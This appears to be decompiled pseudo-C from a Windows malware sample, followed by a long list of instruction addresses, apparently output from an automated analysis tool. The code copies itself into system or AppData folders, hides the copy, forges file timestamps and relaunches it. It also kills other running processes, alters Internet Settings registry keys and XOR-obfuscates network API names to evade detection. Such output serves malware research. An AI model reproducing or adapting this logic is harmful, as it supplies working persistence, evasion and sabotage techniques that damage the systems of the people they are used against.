												ReadFile( *(_t1253 + 0xb0),  *(_t1253 + 0x20), _t1250, _t1253 + 0xa0, 0);
												CloseHandle( *(_t1253 + 0xa0));
												goto L431;
											}
											_t1153 = _t1253 + 0x145c;
											_t943 = GetSystemDirectoryA(_t1153, 0x100);
											_push( *0x4120b0);
											_push(0x41103e);
											_push(_t1153);
											L00405E30();
											L00405E30();
											_t1243 = _t1253 + 0x1568;
											_t945 = E004010F7(_t1253 + 0x1568, _t1153, _t943);
											__eflags = _t945;
											if(_t945 != 0) {
												L415:
												__eflags =  *(_t1253 + 0x20);
												if( *(_t1253 + 0x20) != 0) {
													_t958 = CreateFileA(_t1253 + 0x1470, 0x40000000, 0, 0, 3, 0, 0);
													__eflags = _t958;
													_t1156 = _t958;
													if(_t958 != 0) {
														__eflags = _t958 - 0xffffffff;
														if(_t958 != 0xffffffff) {
															SetFilePointer(_t958, 0xfffffff0, 0, 2);
															WriteFile(_t1156, 0x4120e0, 4, _t1253 + 0xa0, 0);
															CloseHandle(_t1156);
														}
													}
												}
												__eflags =  *(_t1253 + 0xc);
												if( *(_t1253 + 0xc) != 0) {
													_t951 = CreateFileA(_t1253 + 0x1470, 0x80000100, 1, 0, 3, 0, 0); // executed
													__eflags = _t951;
													_t1155 = _t951;
													if(_t951 != 0) {
														__eflags = _t951 - 0xffffffff;
														if(_t951 != 0xffffffff) {
															SetFileTime(_t1155, _t1253 + 0x84, _t1253 + 0x88, _t1253 + 0x8c); // executed
															CloseHandle(_t1155);
														}
													}
												}
												_t1244 = _t1253 + 0x145c;
												SetFileAttributesA(_t1244, 0x21); // executed
												CloseHandle( *(_t1253 + 0x10));
												_t1154 = _t1253 + 0xb28;
												GetStartupInfoA(_t1154);
												_push(_t1253 + 0xb18);
												_push(_t1154);
												_push(0);
												_push(0);
												_push(0);
												_push(0);
												_push(0);
												_push(0);
												_push(0);
												_push(_t1244); // executed
												CreateProcessA(); // executed
												L425:
												ExitProcess(0); // executed
												L426:
												 *0x412000 = 1;
												goto L427;
											}
											_push(0x104);
											_push(_t1153);
											_push( *0x4120b0);
											_push("%CommonProgramFiles%\\System\\");
											_t1221 = _t1253 + 0x1358;
											L00405E20();
											L00405E30();
											_t963 = ExpandEnvironmentStringsA(_t945, _t945, _t1221);
											__eflags = _t963;
											if(_t963 == 0) {
												L413:
												_push(0x104);
												_push(_t1153);
												_push( *0x4120b0);
												_push("%AppData%\\");
												L00405E20();
												L00405E30();
												_t964 = ExpandEnvironmentStringsA(_t963, _t963, _t1221);
												__eflags = _t964;
												if(_t964 == 0) {
													goto L426;
												}
												_t966 = E004010F7(_t1243, _t1153);
												__eflags = _t966;
												if(_t966 == 0) {
													goto L426;
												}
												goto L415;
											}
											_t963 = E004010F7(_t1243, _t1153);
											__eflags = _t963;
											if(_t963 != 0) {
												goto L415;
											}
											goto L413;
										}
										L404:
										CloseHandle( *(_t1253 + 0x10)); // executed
										goto L405;
									}
									__eflags =  *(_t1253 + 0x34) - 0x11;
									if( *(_t1253 + 0x34) > 0x11) {
										__eflags =  *(_t1253 + 0x1c);
										if( *(_t1253 + 0x1c) != 0) {
											goto L425;
										}
										E0040265F(0);
										goto L404;
									}
									_t975 = CreateToolhelp32Snapshot(2, 0);
									__eflags = _t975;
									_t1252 = _t975;
									if(_t975 == 0) {
										L393:
										__eflags =  *(_t1253 + 0x34) - 0xb;
										if( *(_t1253 + 0x34) > 0xb) {
											goto L404;
										}
										_t977 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connection Policy", 0, 0x20019, _t1253 + 0x98);
										__eflags = _t977;
										if(_t977 != 0) {
											goto L404;
										}
										 *(_t1253 + 0x30) = 0;
										_t979 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connection Policy", 0, 0, 0, 0xf003f, 0x408778, _t1253 + 0x98, 0);
										__eflags = _t979;
										if(_t979 != 0) {
											L400:
											RegCloseKey( *(_t1253 + 0x98));
											goto L404;
										}
										 *(_t1253 + 0x9c) = 0x12;
										_t982 = RegQueryValueExA( *(_t1253 + 0xac), "Default Flags", 0, 0, 0x412190, _t1253 + 0x9c);
										__eflags = _t982;
										if(_t982 == 0) {
											_t985 = RegSetValueExA( *(_t1253 + 0xa8), "Default Flags", 0, 3, 0x412190, 0x12);
											__eflags = _t985;
											_t96 = _t985 == 0;
											__eflags = _t96;
											 *(_t1253 + 0x30) = (_t985 & 0xffffff00 | _t96) & 0x000000ff;
										}
										RegCloseKey( *(_t1253 + 0x94));
										__eflags =  *(_t1253 + 0x30);
										if( *(_t1253 + 0x30) == 0) {
											RegDeleteKeyA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connection Policy");
										}
										goto L400;
									}
									_t989 = E004030DE(_t1253 + 0x1f8);
									 *(_t1253 + 4) = _t989;
									__eflags = _t989;
									if(_t989 == 0) {
										L372:
										_t990 = GetCurrentProcessId();
										 *(_t1253 + 0x428) = 0x128;
										_t1157 = _t990;
										_t1222 = 0;
										__eflags = 0;
										_t992 = Process32First(_t1252, _t1253 + 0x428);
										while(1) {
											__eflags = _t992;
											if(_t992 == 0) {
												break;
											}
											__eflags =  *(_t1253 + 0x430) - _t1157;
											if( *(_t1253 + 0x430) == _t1157) {
												L379:
												_t992 = Process32Next(_t1252, _t1253 + 0x428);
												continue;
											}
											_push( *0x4120b0);
											_t1002 = E004010DC(_t1253 + 0x450);
											_push(_t1002);
											_t1246 = _t1002;
											L00405E50();
											__eflags = _t1002;
											if(_t1002 == 0) {
												L377:
												_t1003 = OpenProcess(0x100201, 0,  *(_t1253 + 0x430));
												 *(_t1253 + 0x558 + _t1222 * 4) = _t1003;
												__eflags = _t1003;
												if(_t1003 == 0) {
													goto L379;
												}
												_t1222 = _t1222 + 1;
												__eflags = _t1222 - 9;
												if(_t1222 > 9) {
													break;
												}
												goto L379;
											}
											_push("winrnt.exe");
											_push(_t1246);
											L00405E50();
											__eflags = _t1002;
											if(_t1002 != 0) {
												goto L379;
											}
											goto L377;
										}
										_t1158 = 0;
										__eflags = 0;
										CloseHandle(_t1252);
										while(1) {
											__eflags = _t1158 - _t1222;
											if(_t1158 >= _t1222) {
												break;
											}
											_t1158 = _t1158 + 1;
											SetPriorityClass( *(_t1253 + 0x55c + _t1158 * 4), 0x40);
										}
										_t1245 = 4;
										do {
											_t1159 = 0;
											__eflags = 0;
											while(1) {
												__eflags = _t1159 - _t1222;
												if(_t1159 >= _t1222) {
													goto L387;
												}
												_t1159 = _t1159 + 1;
												TerminateProcess( *(_t1253 + 0x55c + _t1159 * 4), 0);
											}
											L387:
											_t1245 = _t1245 - 1;
											__eflags = _t1245;
										} while (_t1245 >= 0);
										_t1160 = 0;
										__eflags = 0;
										while(1) {
											__eflags = _t1160 - _t1222;
											if(_t1160 >= _t1222) {
												break;
											}
											WaitForSingleObject( *(_t1253 + 0x55c + _t1160 * 4), 0x1388);
											_t1160 = _t1160 + 1;
											CloseHandle( *(_t1253 + 0x558 + _t1160 * 4));
										}
										__eflags =  *(_t1253 + 4);
										if( *(_t1253 + 4) != 0) {
											_t1161 = _t1253 + 0x21e;
											SetFileAttributesA(_t1161, 0x80);
											DeleteFileA(_t1161);
										}
										goto L393;
									}
									RegDeleteValueA(_t989, "SubshellState");
									RegCloseKey( *(_t1253 + 4));
									_t1247 = _t1253 + 0x21a;
									_t1216 = _t1253 + 0x31e;
									while(1) {
										__eflags = _t1247 - _t1216;
										if(_t1247 >= _t1216) {
											goto L372;
										}
										 *_t1247 =  *_t1247 ^  *(_t1253 + 0x1f8) & 0x000000ff;
										_t1247 =  &(_t1247[0]);
									}
									goto L372;
									L405:
									 *(_t1253 + 0x34) =  *(_t1253 + 0x34) + 1;
								}
							}
							_t1071 = "InternetOpenA";
							while(1) {
								__eflags = _t1071 - 0x4105fd;
								if(_t1071 >= 0x4105fd) {
									break;
								}
								 *_t1071 =  *_t1071 ^ 0x000000d4;
								_t1071 =  &(_t1071[1]);
							}
							_t1072 = "InternetOpenUrlA";
							while(1) {
								__eflags = _t1072 - 0x4105ef;
								if(_t1072 >= 0x4105ef) {
									break;
								}
								 *_t1072 =  *_t1072 ^ 0x000000d4;
								_t1072 =  &(_t1072[1]);
							}
							_t1073 = "InternetReadFile";
							while(1) {
								__eflags = _t1073 - 0x4105de;
								if(_t1073 >= 0x4105de) {
									break;
								}
								 *_t1073 =  *_t1073 ^ 0x000000d4;
								_t1073 =  &(_t1073[1]);
							}
							_t1074 = "InternetSetOptionA";
							while(1) {
								__eflags = _t1074 - 0x4105cd;
								if(_t1074 >= 0x4105cd) {
									break;
								}
								 *_t1074 =  *_t1074 ^ 0x000000d4;
								_t1074 =  &(_t1074[1]);
							}
							_t1075 = "InternetCloseHandle";
							while(1) {
								__eflags = _t1075 - 0x4105ba;
								if(_t1075 >= 0x4105ba) {
									break;
								}
								 *_t1075 =  *_t1075 ^ 0x000000d4;
								_t1075 =  &(_t1075[1]);
							}
							 *0x4121d0 = GetProcAddress(_t1113, "InternetOpenA");
							 *0x4121e0 = GetProcAddress(_t1113, "InternetOpenUrlA");
							 *0x4121f0 = GetProcAddress(_t1113, "InternetReadFile");
							 *0x412200 = GetProcAddress(_t1113, "InternetSetOptionA");
							 *0x412210 = GetProcAddress(_t1113, "InternetCloseHandle");
							goto L105;
						}
						_t1086 = "GetIpAddrTable";
						while(1) {
							__eflags = _t1086 - 0x4106f4;
							if(_t1086 >= 0x4106f4) {
								break;
							}
							 *_t1086 =  *_t1086 ^ 0x000000d4;
							_t1086 =  &(_t1086[1]);
						}
						 *0x4121c0 = GetProcAddress(_t1112, "GetIpAddrTable");
						goto L64;
					}
					_t1088 = "RasEnumConnectionsA";
					while(1) {
						__eflags = _t1088 - 0x410715;
						if(_t1088 >= 0x410715) {
							break;
						}
						 *_t1088 =  *_t1088 ^ 0x000000d4;
						_t1088 =  &(_t1088[1]);
					}
					 *0x4121b0 = GetProcAddress(_t1111, "RasEnumConnectionsA");
					goto L55;
				}
				_t1090 = GetProcAddress(_t1107, "NtQueryInformationToken");
				__eflags = _t1090;
				_t1223 = _t1090;
				if(_t1090 == 0) {
					goto L46;
				}
				_t1092 =  *_t1224(0xffffffff, 8, _t1253 + 0xa0);
				__eflags = _t1092;
				if(_t1092 < 0) {
					goto L46;
				}
				_t1248 = _t1253 + 0x9c;
				_t1094 = E00401000(0x2000);
				_t1162 = _t1094;
				_t1095 =  *_t1223( *(_t1253 + 0xb0), 2, _t1094, 0x2000, _t1248); // executed
				__eflags = _t1095;
				if(_t1095 < 0) {
					L45:
					E00401029(_t1162);
					CloseHandle( *(_t1253 + 0xa0)); // executed
					goto L46;
				}
				 *(_t1253 + 0x34) = 0;
				_t1163 =  *_t1162;
				while(1) {
					__eflags =  *(_t1253 + 0x34) - _t1163;
					if( *(_t1253 + 0x34) >= _t1163) {
						goto L45;
					}
					_t1171 =  *(_t1253 + 0x34);
					_t1099 = _t1162[8 + _t1171 * 8];
					__eflags = _t1099 & 0x00000004;
					if((_t1099 & 0x00000004) == 0) {
						L44:
						 *(_t1253 + 0x34) =  *(_t1253 + 0x34) + 1;
						continue;
					}
					__eflags = _t1099 & 0x00000010;
					if((_t1099 & 0x00000010) != 0) {
						goto L44;
					}
					_t1171 = _t1162[4 + _t1171 * 8];
					_t1101 =  *((intOrPtr*)(_t1171 + 4 + ( *(_t1171 + 1) & 0x000000ff) * 4));
					__eflags = _t1101 - 0x220;
					if(__eflags == 0) {
						L39:
						 *(_t1253 + 0xb) = 0;
						 *0x412020 = 1; // executed
						_t1102 =  *_t1223( *(_t1253 + 0xb0), 1, _t1162, 0x2000, _t1248); // executed
						__eflags = _t1102;
						if(_t1102 >= 0) {
							_t1103 =  *_t1162;
							__eflags =  *((char*)(_t1103 + 1)) - 1;
							if( *((char*)(_t1103 + 1)) == 1) {
								__eflags =  *((intOrPtr*)(_t1103 + 8)) - 0x12;
								if( *((intOrPtr*)(_t1103 + 8)) == 0x12) {
									 *(_t1253 + 0xb) = 1;
								}
							}
						}
						_t1171 =  *(_t1253 + 0xb) & 0x000000ff;
						 *0x412010 = _t1171;
						goto L45;
					}
					if(__eflags > 0) {
						__eflags = _t1101 - 0x223;
					} else {
						__eflags = _t1101 - 0x200;
					}
					if(__eflags != 0) {
						goto L44;
					} else {
						goto L39;
					}
				}
				goto L45;
			}

0x004035b5
0x004035ba
0x004035c1
0x004035c4
0x004035c4
0x004035d2
0x004035d7
0x004035dc
0x004035dc
0x004035e1
0x00000000
0x00000000
0x004035e3
0x004035e6
0x004035e6
0x004035e9
0x004035ee
0x004035ee
0x004035f3
0x00000000
0x00000000
0x004035f5
0x004035f8
0x004035f8
0x004035fb
0x00403600
0x00403600
0x00403605
0x00000000
0x00000000
0x00403607
0x0040360a
0x0040360a
0x0040360d
0x00403612
0x00403612
0x00403617
0x00000000
0x00000000
0x00403619
0x0040361c
0x0040361c
0x0040361f
0x00403624
0x00403624
0x00403629
0x00000000
0x00000000
0x0040362b
0x0040362e
0x0040362e
0x0040363b
0x00403641
0x0040364e
0x0040365e
0x0040366e
0x00403673
0x00403678
0x0040367d
0x0040367f
0x00403681
0x00403691
0x00403691
0x00403693
0x00403698
0x00403698
0x0040369d
0x00000000
0x00000000
0x0040369f
0x004036a2
0x004036a2
0x004036a5
0x004036aa
0x004036aa
0x004036af
0x00000000
0x00000000
0x004036b1
0x004036b4
0x004036b4
0x004036bd
0x004036c2
0x004036c4
0x004036c6
0x0040380d
0x00403814
0x00403815
0x00403817
0x0040381c
0x00403823
0x00403832
0x00403832
0x00403834
0x00403839
0x0040383f
0x0040383f
0x00403844
0x00000000
0x00000000
0x00403846
0x00403849
0x00403849
0x00403851
0x00403856
0x00403858
0x0040385a
0x00403880
0x0040388a
0x0040388a
0x0040388f
0x0040388f
0x00403894
0x00000000
0x00000000
0x00403896
0x00403899
0x00403899
0x004038a1
0x004038a6
0x004038a8
0x004038aa
0x004038d0
0x004038da
0x004038da
0x004038df
0x004038df
0x004038e4
0x00000000
0x00000000
0x004038e6
0x004038e9
0x004038e9
0x004038ec
0x004038f1
0x004038f1
0x004038f6
0x00000000
0x00000000
0x004038f8
0x004038f8
0x004038fb
0x004038fb
0x004038fe
0x00403903
0x00403903
0x00403908
0x00000000
0x00000000
0x0040390a
0x0040390a
0x0040390d
0x0040390d
0x00403910
0x00403915
0x00403915
0x0040391a
0x00000000
0x00000000
0x0040391c
0x0040391c
0x0040391f
0x0040391f
0x00403922
0x00403927
0x00403927
0x0040392c
0x00000000
0x00000000
0x0040392e
0x0040392e
0x00403931
0x00403931
0x00403934
0x00403939
0x00403939
0x0040393e
0x00000000
0x00000000
0x00403940
0x00403940
0x00403943
0x00403943
0x0040394b
0x00403950
0x00403952
0x00403954
0x00403a06
0x00403a10
0x00403a10
0x00403a15
0x00403a15
0x00403a1a
0x00000000
0x00000000
0x00403a1c
0x00403a1f
0x00403a1f
0x00403a22
0x00403a27
0x00403a27
0x00403a2c
0x00000000
0x00000000
0x00403a2e
0x00403a2e
0x00403a31
0x00403a31
0x00403a34
0x00403a39
0x00403a39
0x00403a3e
0x00000000
0x00000000
0x00403a40
0x00403a40
0x00403a43
0x00403a43
0x00403a46
0x00403a4b
0x00403a4b
0x00403a50
0x00000000
0x00000000
0x00403a52
0x00403a52
0x00403a55
0x00403a55
0x00403a58
0x00403a5d
0x00403a5d
0x00403a62
0x00000000
0x00000000
0x00403a64
0x00403a64
0x00403a67
0x00403a67
0x00403a6a
0x00403a6f
0x00403a6f
0x00403a74
0x00000000
0x00000000
0x00403a76
0x00403a76
0x00403a79
0x00403a79
0x00403a7c
0x00403a81
0x00403a81
0x00403a86
0x00000000
0x00000000
0x00403a88
0x00403a88
0x00403a8b
0x00403a8b
0x00403a8e
0x00403a93
0x00403a93
0x00403a98
0x00000000
0x00000000
0x00403a9a
0x00403a9a
0x00403a9d
0x00403a9d
0x00403aa0
0x00403aa5
0x00403aa5
0x00403aaa
0x00000000
0x00000000
0x00403aac
0x00403aac
0x00403aaf
0x00403aaf
0x00403ab2
0x00403ab7
0x00403ab7
0x00403abc
0x00000000
0x00000000
0x00403abe
0x00403abe
0x00403ac1
0x00403ac1
0x00403ac4
0x00403ac9
0x00403ac9
0x00403ace
0x00000000
0x00000000
0x00403ad0
0x00403ad0
0x00403ad3
0x00403ad3
0x00403ad6
0x00403adb
0x00403adb
0x00403ae0
0x00000000
0x00000000
0x00403ae2
0x00403ae2
0x00403ae5
0x00403ae5
0x00403ae8
0x00403aed
0x00403aed
0x00403af2
0x00000000
0x00000000
0x00403af4
0x00403af4
0x00403af7
0x00403af7
0x00403afa
0x00403aff
0x00403aff
0x00403b04
0x00000000
0x00000000
0x00403b06
0x00403b06
0x00403b09
0x00403b09
0x00403b0c
0x00403b11
0x00403b11
0x00403b16
0x00000000
0x00000000
0x00403b18
0x00403b18
0x00403b1b
0x00403b1b
0x00403b1e
0x00403b23
0x00403b23
0x00403b28
0x00000000
0x00000000
0x00403b2a
0x00403b2a
0x00403b2d
0x00403b2d
0x00403b30
0x00403b35
0x00403b35
0x00403b3a
0x00000000
0x00000000
0x00403b3c
0x00403b3c
0x00403b3f
0x00403b3f
0x00403b42
0x00403b47
0x00403b47
0x00403b4c
0x00000000
0x00000000
0x00403b4e
0x00403b4e
0x00403b51
0x00403b51
0x00403b54
0x00403b59
0x00403b59
0x00403b5e
0x00000000
0x00000000
0x00403b60
0x00403b60
0x00403b63
0x00403b63
0x00403b66
0x00403b6b
0x00403b6b
0x00403b70
0x00000000
0x00000000
0x00403b72
0x00403b72
0x00403b75
0x00403b75
0x00403b78
0x00403b7d
0x00403b7d
0x00403b82
0x00000000
0x00000000
0x00403b84
0x00403b84
0x00403b87
0x00403b87
0x00403b8a
0x00403b8f
0x00403b8f
0x00403b94
0x00000000
0x00000000
0x00403b96
0x00403b96
0x00403b99
0x00403b99
0x00403b9c
0x00403ba1
0x00403ba1
0x00403ba6
0x00000000
0x00000000
0x00403ba8
0x00403ba8
0x00403bab
0x00403bab
0x00403bae
0x00403bb3
0x00403bb3
0x00403bb8
0x00000000
0x00000000
0x00403bba
0x00403bba
0x00403bbd
0x00403bbd
0x00403bc0
0x00403bc5
0x00403bc5
0x00403bca
0x00000000
0x00000000
0x00403bcc
0x00403bcc
0x00403bcf
0x00403bcf
0x00403bd2
0x00403bd7
0x00403bd7
0x00403bdc
0x00000000
0x00000000
0x00403bde
0x00403bde
0x00403be1
0x00403be1
0x00403be4
0x00403be9
0x00403be9
0x00403bee
0x00000000
0x00000000
0x00403bf0
0x00403bf0
0x00403bf3
0x00403bf3
0x00403bf6
0x00403bfb
0x00403bfb
0x00403c00
0x00000000
0x00000000
0x00403c02
0x00403c02
0x00403c05
0x00403c05
0x00403c08
0x00403c0d
0x00403c0d
0x00403c12
0x00000000
0x00000000
0x00403c14
0x00403c14
0x00403c17
0x00403c17
0x00403c1a
0x00403c1f
0x00403c1f
0x00403c24
0x00000000
0x00000000
0x00403c26
0x00403c26
0x00403c29
0x00403c29
0x00403c2c
0x00403c31
0x00403c31
0x00403c36
0x00000000
0x00000000
0x00403c38
0x00403c38
0x00403c3b
0x00403c3b
0x00403c3e
0x00403c43
0x00403c43
0x00403c48
0x00000000
0x00000000
0x00403c4a
0x00403c4a
0x00403c4d
0x00403c4d
0x00403c50
0x00403c55
0x00403c55
0x00403c5a
0x00000000
0x00000000
0x00403c5c
0x00403c5c
0x00403c5f
0x00403c5f
0x00403c62
0x00403c67
0x00403c67
0x00403c6c
0x00000000
0x00000000
0x00403c6e
0x00403c6e
0x00403c71
0x00403c71
0x00403c74
0x00403c79
0x00403c79
0x00403c7e
0x00000000
0x00000000
0x00403c80
0x00403c80
0x00403c83
0x00403c83
0x00403c86
0x00403c8b
0x00403c8b
0x00403c90
0x00000000
0x00000000
0x00403c92
0x00403c92
0x00403c95
0x00403c95
0x00403c98
0x00403c9d
0x00403c9d
0x00403ca2
0x00000000
0x00000000
0x00403ca4
0x00403ca4
0x00403ca7
0x00403ca7
0x00403caa
0x00403caf
0x00403caf
0x00403cb4
0x00000000
0x00000000
0x00403cb6
0x00403cb6
0x00403cb9
0x00403cb9
0x00403cbc
0x00403cc1
0x00403cc1
0x00403cc6
0x00000000
0x00000000
0x00403cc8
0x00403cc8
0x00403ccb
0x00403ccb
0x00403cce
0x00403cd3
0x00403cd3
0x00403cd8
0x00000000
0x00000000
0x00403cda
0x00403cda
0x00403cdd
0x00403cdd
0x00403ce0
0x00403ce5
0x00403ce5
0x00403cea
0x00000000
0x00000000
0x00403cec
0x00403cec
0x00403cef
0x00403cef
0x00403cf2
0x00403cf7
0x00403cf7
0x00403cfc
0x00000000
0x00000000
0x00403cfe
0x00403cfe
0x00403d01
0x00403d01
0x00403d04
0x00403d09
0x00403d09
0x00403d0e
0x00000000
0x00000000
0x00403d10
0x00403d10
0x00403d13
0x00403d13
0x00403d16
0x00403d1b
0x00403d1b
0x00403d20
0x00000000
0x00000000
0x00403d22
0x00403d22
0x00403d25
0x00403d25
0x00403d28
0x00403d2d
0x00403d2d
0x00403d32
0x00000000
0x00000000
0x00403d34
0x00403d34
0x00403d37
0x00403d37
0x00403d3a
0x00403d3f
0x00403d3f
0x00403d44
0x00000000
0x00000000
0x00403d46
0x00403d46
0x00403d49
0x00403d49
0x00403d4c
0x00403d51
0x00403d51
0x00403d56
0x00000000
0x00000000
0x00403d58
0x00403d58
0x00403d5b
0x00403d5b
0x00403d5e
0x00403d63
0x00403d63
0x00403d68
0x00000000
0x00000000
0x00403d6a
0x00403d6a
0x00403d6d
0x00403d6d
0x00403d70
0x00403d75
0x00403d75
0x00403d7a
0x00000000
0x00000000
0x00403d7c
0x00403d7c
0x00403d7f
0x00403d7f
0x00403d82
0x00403d87
0x00403d87
0x00403d8c
0x00000000
0x00000000
0x00403d8e
0x00403d8e
0x00403d91
0x00403d91
0x00403d94
0x00403d99
0x00403d99
0x00403d9e
0x00000000
0x00000000
0x00403da0
0x00403da0
0x00403da3
0x00403da3
0x00403da6
0x00403dab
0x00403dab
0x00403db0
0x00000000
0x00000000
0x00403db2
0x00403db2
0x00403db5
0x00403db5
0x00403db8
0x00403dbd
0x00403dbd
0x00403dc2
0x00000000
0x00000000
0x00403dc4
0x00403dc4
0x00403dc7
0x00403dc7
0x00403dca
0x00403dcf
0x00403dcf
0x00403dd4
0x00000000
0x00000000
0x00403dd6
0x00403dd6
0x00403dd9
0x00403dd9
0x00403ddc
0x00403de1
0x00403de1
0x00403de6
0x00000000
0x00000000
0x00403de8
0x00403de8
0x00403deb
0x00403deb
0x00403dee
0x00403df3
0x00403df3
0x00403df8
0x00000000
0x00000000
0x00403dfa
0x00403dfa
0x00403dfd
0x00403dfd
0x00403e05
0x00403e05
0x00403e0a
0x00000000
0x00000000
0x00403e0c
0x00403e0c
0x00403e0d
0x00403e0d
0x00403e17
0x00403e17
0x00403e1c
0x00000000
0x00000000
0x00403e1e
0x00403e1e
0x00403e1f
0x00403e1f
0x00403e29
0x00403e29
0x00403e2e
0x00000000
0x00000000
0x00403e30
0x00403e30
0x00403e31
0x00403e31
0x00403e4d
0x00403e52
0x00403e59
0x00403e5b
0x00403e5d
0x00403e60
0x00403e69
0x00403e86
0x00403e92
0x00403e97
0x00403e9e
0x00403ea5
0x00403eaa
0x00403eaa
0x00403e9e
0x00403e60
0x00403eb2
0x00403eb7
0x00403eb7
0x00403ebc
0x00000000
0x00000000
0x00403ebe
0x00403ec1
0x00403ec1
0x00403ec4
0x00403ec9
0x00403ec9
0x00403ece
0x00000000
0x00000000
0x00403ed0
0x00403ed0
0x00403ed3
0x00403ed3
0x00403ed6
0x00403ee2
0x00403ef3
0x00403f09
0x00403f1f
0x00403f35
0x00403f3a
0x00403f46
0x00403f4b
0x00403f51
0x00403f5d
0x00403f62
0x00403f63
0x00403f68
0x00403f6a
0x00403f6a
0x00403f70
0x00403f74
0x00403f79
0x00403f79
0x00403f7e
0x00000000
0x00000000
0x00403f80
0x00403f80
0x00403f83
0x00403f83
0x00403f86
0x00403f8b
0x00403f8b
0x00403f90
0x00000000
0x00000000
0x00403f92
0x00403f92
0x00403f95
0x00403f95
0x00403f98
0x00403f9d
0x00403f9d
0x00403fa2
0x00000000
0x00000000
0x00403fa4
0x00403fa4
0x00403fa7
0x00403fa7
0x00403faa
0x00403fb2
0x00403fb2
0x00403fc0
0x00403fd1
0x00403fd6
0x00403fda
0x00403fdd
0x00403fdf
0x00000000
0x00000000
0x00403fe5
0x00403fea
0x00403fef
0x0040426e
0x00404273
0x0040428c
0x00404299
0x0040429e
0x004042a0
0x004042b2
0x004042b7
0x004042be
0x004042c1
0x004042c3
0x004042de
0x004042ea
0x004042ef
0x004042ef
0x004042c3
0x004042f7
0x004042fc
0x004044af
0x004044c6
0x004044cb
0x004044d2
0x004044d4
0x00404517
0x00404517
0x0040451f
0x0040451f
0x00404521
0x00404545
0x0040454a
0x0040454f
0x0040454f
0x00404554
0x00000000
0x00000000
0x00404556
0x00404559
0x00404559
0x00404561
0x00404561
0x00404566
0x00000000
0x00000000
0x00404568
0x00404568
0x00404569
0x00404569
0x0040456e
0x00404575
0x004047c9
0x004047c9
0x004047d6
0x004047de
0x004047e3
0x004047e5
0x004047f1
0x004047f1
0x004047fd
0x004047fe
0x00404835
0x004048cf
0x004048d4
0x004048d7
0x004048dc
0x004048dc
0x004048e1
0x00000000
0x00000000
0x004048e3
0x004048e6
0x004048e6
0x004048ee
0x004048ee
0x004048f3
0x00000000
0x00000000
0x004048f5
0x004048f5
0x004048f6
0x004048f6
0x004048fb
0x00404900
0x00404905
0x0040490c
0x0040490d
0x00404912
0x00404913
0x00404926
0x0040492b
0x0040492d
0x00404b8d
0x00404b94
0x00404b99
0x00404ba0
0x00404ba2
0x00404ce5
0x00404ce5
0x00404cea
0x00404cec
0x00404cee
0x00404cf0
0x00404cf0
0x00404cf2
0x00404cf9
0x00404cfe
0x00404d00
0x00404d02
0x00404d04
0x00404d04
0x00404d06
0x00404d0d
0x00404d1a
0x00404d1b
0x00404d27
0x00404d2f
0x00404d30
0x00404d35
0x00404d39
0x00404d3c
0x00404d3c
0x00404d3e
0x00000000
0x00000000
0x00404d48
0x00404d4a
0x00404d4f
0x00404d4f
0x00404d58
0x00404d65
0x00404d6a
0x00404d6c
0x00404dad
0x00404dad
0x00404dba
0x00404dbf
0x00404dc1
0x00404e76
0x00404e7a
0x00404e84
0x00404e8c
0x00404e91
0x00404e96
0x00404e9c
0x00404ea1
0x00404ea2
0x00404ea8
0x00404eae
0x00404ec6
0x00404ecb
0x00404ed2
0x00404ed4
0x00404f78
0x00404f78
0x00404f7d
0x00404f80
0x00404fa3
0x00404fb0
0x00404fb5
0x00404fba
0x00404fc1
0x00404fc7
0x00404fdf
0x00404fe4
0x00404feb
0x00404fed
0x00404ff6
0x00404ff6
0x00404ffb
0x00404ffe
0x00000000
0x00000000
0x00405006
0x0040500b
0x00405010
0x00405017
0x0040501d
0x00405035
0x0040503a
0x00405041
0x00405043
0x0040504c
0x0040504c
0x00405051
0x00405054
0x00000000
0x00000000
0x00405080
0x00405085
0x00405092
0x00405097
0x0040509c
0x004050a3
0x004050a9
0x004050c1
0x004050c6
0x004050cd
0x004050cf
0x004050d1
0x004050d8
0x004050d8
0x004050e5
0x004050ea
0x004050ef
0x004050f6
0x004050fc
0x00405114
0x00405119
0x00405120
0x00405122
0x00405124
0x00405153
0x00405153
0x0040515b
0x0040515b
0x00405163
0x0040517c
0x0040517c
0x00405186
0x0040518e
0x00405193
0x00405198
0x00405199
0x004051a0
0x004051b0
0x004051b7
0x004051c7
0x004051ce
0x004051d3
0x004051d8
0x004051d8
0x004051dd
0x00000000
0x00000000
0x004051df
0x004051e2
0x004051e2
0x004051fe
0x00405203
0x00405205
0x00405229
0x00405229
0x0040522e
0x00405237
0x0040523e
0x00405243
0x00405244
0x00405249
0x00405249
0x0040525d
0x0040525d
0x0040526e
0x0040527a
0x0040527f
0x0040527f
0x00405286
0x004054f1
0x0040550f
0x00405514
0x00405519
0x00405519
0x0040551e
0x00000000
0x00000000
0x00405520
0x00405523
0x00405523
0x00405526
0x0040552e
0x00405538
0x0040553d
0x00405542
0x00000000
0x00000000
0x00405548
0x00405548
0x00405550
0x00405558
0x0040555d
0x0040555f
0x004057d5
0x004057d5
0x004057f2
0x004057f2
0x004057fa
0x004057fa
0x00405802
0x00405804
0x00405806
0x0040580b
0x00405810
0x00405815
0x0040581a
0x0040581f
0x0040582c
0x00405831
0x00405831
0x00405834
0x00405839
0x00405841
0x00405849
0x00405863
0x00405868
0x0040586a
0x00405873
0x00405878
0x0040589d
0x004058a2
0x004058a3
0x004058a8
0x004058a8
0x004058bb
0x004058c7
0x004058c7
0x0040586a
0x004058cc
0x004058d1
0x004058d8
0x00405933
0x00405938
0x0040593a
0x00405957
0x00405957
0x0040595e
0x0040595f
0x00405964
0x00405964
0x00405965
0x00405966
0x00405967
0x00405969
0x0040596b
0x00405971
0x00405978
0x00405984
0x00405989
0x00405989
0x0040598e
0x00000000
0x00000000
0x00405996
0x004059b8
0x004059bd
0x004059bf
0x004059e7
0x00405a04
0x00405a10
0x00405a15
0x00405a17
0x00405a1f
0x00405a24
0x00405a2b
0x00405a32
0x00405a9f
0x00405aa4
0x00405aa6
0x00000000
0x00000000
0x00405aa8
0x00405aa9
0x00405abe
0x00405ada
0x00405ae6
0x00405af6
0x00405afb
0x00405afd
0x00000000
0x00000000
0x00405aff
0x00405b06
0x00000000
0x00405b06
0x00405a3f
0x00405a44
0x00405a46
0x00000000
0x00000000
0x00405a53
0x00405a58
0x00405a59
0x00405a71
0x00405a8d
0x00000000
0x00405a8d
